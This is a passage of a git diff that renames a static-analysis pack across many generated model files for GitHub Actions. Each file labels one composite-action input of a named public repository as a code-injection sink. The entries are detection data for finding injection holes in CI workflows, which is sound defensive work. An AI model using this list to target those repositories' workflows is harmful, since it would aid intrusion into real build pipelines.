["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index 44d9eb10a0d..a97bce1de7a 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index 0d7f80698f5..5bf814bcc69 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 84caa043484..6a141053bbe 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index f6aed253a21..4fec81ed178 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 1eac49617f2..1290646ef6d 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index 1efa6815c28..60a023c9730 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 91463a305dd..1a99c3773de 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index 7ef240ad999..e3cf5db0f15 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index db953acf5bc..67866c4f904 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 7c1b01e14b5..2317aa06ae2 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index 37b67a933a3..baf9c55ff18 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 570a9bdd142..583be58ecd2 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index 8c1993c47ca..e8250232853 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index ee0adaadb3e..d3172c56667 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index c127f03bb66..7c1f9dac6bb 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index 3b3d60fadd0..c77798c1022 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 4dd43acd2c5..3035324bee0 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index cb4bff25f9a..dd208976fc5 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 39a204389b9..63f111f3e83 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 6b4192c0c61..c330ca64c08 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index 63c3fc89058..6b67c69e6e3 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 72772ae47cf..135bb4baa8b 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 43cc1e0187e..c201386cf93 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 7c80b7e6eda..5e39d3f6c5f 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 1f7b69e6254..9a9f865b0db 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 7879a7903b4..5c877a87d68 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index dbbd4c720ca..6e9e8363290 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index f99698b1992..f0e62cdaec1 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index a98a135d6b4..b1158922636 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index 3ebb5e7acb3..78c1a396056 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index b26aa6ea48b..75c257f39ae 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 683965e13d2..4d19b3ec0af 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index 9358c895f3c..b8bdc7276fb 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 8233e506603..220dbb58e02 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 2aea730db7e..1992cbf4696 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index b03d2391882..02c01196842 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 9db70f02db4..50af2e33e16 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 8cea15ac9e1..679b362ba3f 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 766ec515551..8e11db68c85 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index 13ee2f4e7a8..deed2d12573 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index 0cf05c2273b..353cb30683b 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 7f2622feecd..25522a67b69 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 3aa8c3bc649..c545ad6844e 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index b79317db9c8..941710eb0fe 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 843e0d20b98..75b744fc036 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 2a0fd3ac371..7a4ea3514ba 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 3ef29cc9b84..25a25d085ad 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 71d2012eb02..23bd58d66cb 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index a67aeb90595..1849ad0e2f5 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 1f5dd108f91..c4861c77842 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index ea4a2a2a3c7..b11931b5408 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 29973ccdbd7..1b3fffbe869 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index 2db70ffea66..df6f6088087 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 8a4273e8caf..89c10bd95c2 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml 